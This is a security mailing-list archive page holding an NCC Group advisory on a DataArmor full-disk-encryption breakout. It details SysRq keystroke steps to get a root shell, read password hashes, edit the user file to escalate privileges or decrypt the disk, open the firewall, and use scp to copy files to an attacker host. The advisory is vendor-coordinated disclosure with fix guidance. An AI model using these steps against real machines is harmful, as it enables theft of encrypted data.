Home page logo
/

bugtraq logo Bugtraq mailing list archives

NGS000193 Technical Advisory: DataArmor Full Disk Encryption Restricted Environment breakout
From: NCC Group Research <research () nccgroup com>
Date: Fri, 30 Nov 2012 09:40:48 +0000

=======
Summary
=======
Name: DataArmor Full Disk Encryption - Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe <stuart.passe () ngssecure com>
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861 
Risk: Critical
Status: Published

========
TimeLine
========
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17 January 2012
Reported: 17 January 2012
Fixed: 23 January 2012
Published: 30 November 2012

===========
Description
===========
The Mobile Armor DataArmor Full Disk Encryption platform allows users to fully encrypt hard drives utilising 
centralised security policy management.

An issue exists whereby it is possible for unauthenticated users to break out from the restricted DataArmor 
environment, providing unrestricted administrative access to the underlying platform and associated configuration files.

This allows users to arbitrarily modify both the platform and associated configuration files. Authentication 
credentials can then be added and/or generated, providing the ability to escalate privileges and gain full access to 
data stored on the encrypted partition.

=================
Technical Details
=================
The DataArmor software appears to be running under a restricted Linux X11 environment, configured to grab all 
keystrokes so that special key combinations which might normally be accepted by a Linux Kernel (such as "reboot" 
[Ctrl+Alt+Del] or "switch TTY" [Ctrl+Alt+{F1-F12}]) are discarded and not acted upon by the underlying Operating System.

It is possible to bypass this keystroke grabbing (through use of the SysRq key), providing the ability to send special 
commands directly to the Linux Kernel and break-out from the DataArmor environment into the underlying Linux BusyBox 
Operating System. This subsequently exposes the running DataArmor environment to full manipulation by any user with 
physical access to the machine, with the possibility of recovering files or fully decrypting the hard disk by 
unauthorised users.

Technical Details (Proof of Concept)
====================================

Restricted Environment Breakout
-------------------------------
Note: The "SysRq" key is usually located near the "Print Screen" key. On some laptops "SysRq" is accessible only by 
pressing "Fn". In this case the combination is a bit trickier:  hold "Alt", hold "Fn", hold "SysRq", release "Fn", 
press key.

1.      Power on laptop and allow DataArmor software to present authentication screen
2.      Send the SIGTERM signal to all processes except init (Alt+SysRq+e), which results in a blank screen being 
displayed 
3.      Switch to TTY2 (Ctrl+Alt+F2), which will display a cursor 
4.      Send the SIGKILL signal to all processes except init (Alt+SysRq+i), which will display the following prompt 
5.      Press "Return" to activate shell as root
6.      Verify that shell is obtained 
7.      Open an additional TTY (Ctrl+Alt+F3) and press "Return"
8.      Verify that the DataArmor "MAAuthenticate" software is not running (ps) 
9.      Switch back to TTY2 (Ctrl+Alt+F2)
10.     Reinitialise the X11 environment (startx)
11.     Allow the DataArmor software to fully load
12.     Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
13.     Switch back to the additional TTY3 (Ctrl+Alt+F3)
14.     Check in the process list that DataArmor is fully running (ps)  

At this stage, it is possible to manipulate the DataArmor environment into performing how we wish, allowing for 
potential full compromise of the laptop and encrypted data. We can view all current local users and hashes (cat 
/etc/Source/MAData.xml) for offline password-cracking as well as view and modify the local security policy (cat 
/etc/Source/PolicyFile.xml). This can however be taken a stage further. In addition to viewing the contents of these 
files, the DataArmor software re-reads the contents of the files when an authentication attempt is made, allowing a 
user to modify the files within the XFS /etc partition and have the software act accordingly (this can be useful for 
acts such as modifying the policy to prevent data erase and lockouts after failed password attempts, or change 
authentication method to local file containing hashes). The following can be performed after step 13 above, with the 
DataArmor software fully running.

Add User or Escalate Privileges
-------------------------------
Note: Whilst the privilege escalation vulnerability has been proven successfully within the test environment, the 
ability to successfully add users isn't fully tested at this stage due to uncertainties as to the
method of hash generation. This is purely a time restriction limitation due to short-term access to a DataArmor-enabled 
laptop, and could be successfully overcome with more time to complete reverse engineering efforts.

1.      Navigate to the directory containing configuration files (cd /etc/Source)
2.      Open the users file for editing (vi MAData.xml) 
3.      Add new user and associated hashes to file, making sure to write file (:wq)
4.      Alternatively if credentials are known for a standard non-administrative user, edit the file and change the 
UserType to "1" to escalate privileges to an Administrator (<UserType>1</UserType>)
5.      Return to the DataArmor screen running on TTY1 (Ctrl+Alt+F1)
6.      Enter new/modified credentials into authentication box
7.      Successful authentication presents the user with an additional option to access the Recovery Console (an 
administrative function)
8.      This console gives the user free access to administrative functionality 
9.      This subsequently allows the user to recover sensitive files from the encrypted partition (such as Windows SAM 
files and user documents) and transfer them  to external media such as a USB stick
10.     Alternatively the user can fully decrypt the hard disk, at which point standard techniques for extracting data 
from the hard disk are applicable 

Import/Export DataArmor Environment
-----------------------------------
Alongside fully compromising the running system through modification, the built-in networking capabilities within the 
Linux BusyBox Operating System mean that all platform files can potentially be moved from the local install to a 
secondary machine, or vice versa. This allows not only the possibility of extracting the sensitive files for analysis 
(and potentially cracking) offline in order to gain access to the laptop with existing user credentials, but the 
ability to transfer files back means that important libraries and executables may be modified on an attacker's machine 
and then uploaded to the "victim" laptop, potentially fully bypassing the encryption altogether or causing further 
malicious actions such as logging keystrokes and sending them via network to the attacker in order to capture valid 
credentials.

1.      Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
2.      Switch back to the additional TTY3 (Ctrl+Alt+F3)
3.      Verify the currently running iptables ruleset (iptables -L) 
4.      Change the default rules from "DROP" to "ACCEPT" to allow full network access (vi /etc/iptables.conf) 
5.      Load modified iptables ruleset (iptables-restore < /etc/iptables.conf)
6.      The presence of ssh and scp within the DataArmor environment allows for transferring files either from the 
victim (scp /etc/Source/sensitive_files attacker () 192 168 0 1:/tmp/) or to the victim machine (scp attacker () 192 
168 0 1:/tmp/modified_files /etc/Source/) 

===============
Fix Information
===============
An updated version of the software has been released to address these vulnerabilities:
http://esupport.trendmicro.com/solution/en-us/1060043.aspx


It is possible to change the configuration parameters whilst the kernel is running by either setting a sysctl parameter 
(kernel.sysrq = 0) or disabling directly through the /proc filesystem (echo "0" > /proc/sys/kernel/sysrq), however 
there is a short period of time where the kernel is still vulnerable during the booting process, before the contents of 
the configuration files are applied.

Due to this small window of vulnerability, the preferred option is to re-compile the Linux Kernel. The SysRq key 
combination is compiled in to most modern Linux Kernels by default, and to disable this fully, it must be explicitly 
specified during compilation of the Linux Kernel by modifying the required option (CONFIG_MAGIC_SYSRQ).

Additionally, consideration should be taken to strip down the Linux BusyBox environment in order to remove any 
potentially unnecessary functionality such as the shell and associated administrative tools (sh, bash, strace, ssh, 
scp, etc...).

Wikipedia "Magic SysRq Key" - http://en.wikipedia.org/wiki/Magic_SysRq_key
Linux Kernel Documentation - http://kernel.org/doc/Documentation/sysrq.txt
The Linux Documentation Project - http://tldp.org/HOWTO/Remote-Serial-Console-HOWTO/security-sysrq.html

NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a href="http://www.mimecast.com";>http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>


  By Date           By Thread  

Current thread:
  • NGS000193 Technical Advisory: DataArmor Full Disk Encryption Restricted Environment breakout NCC Group Research (Nov 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]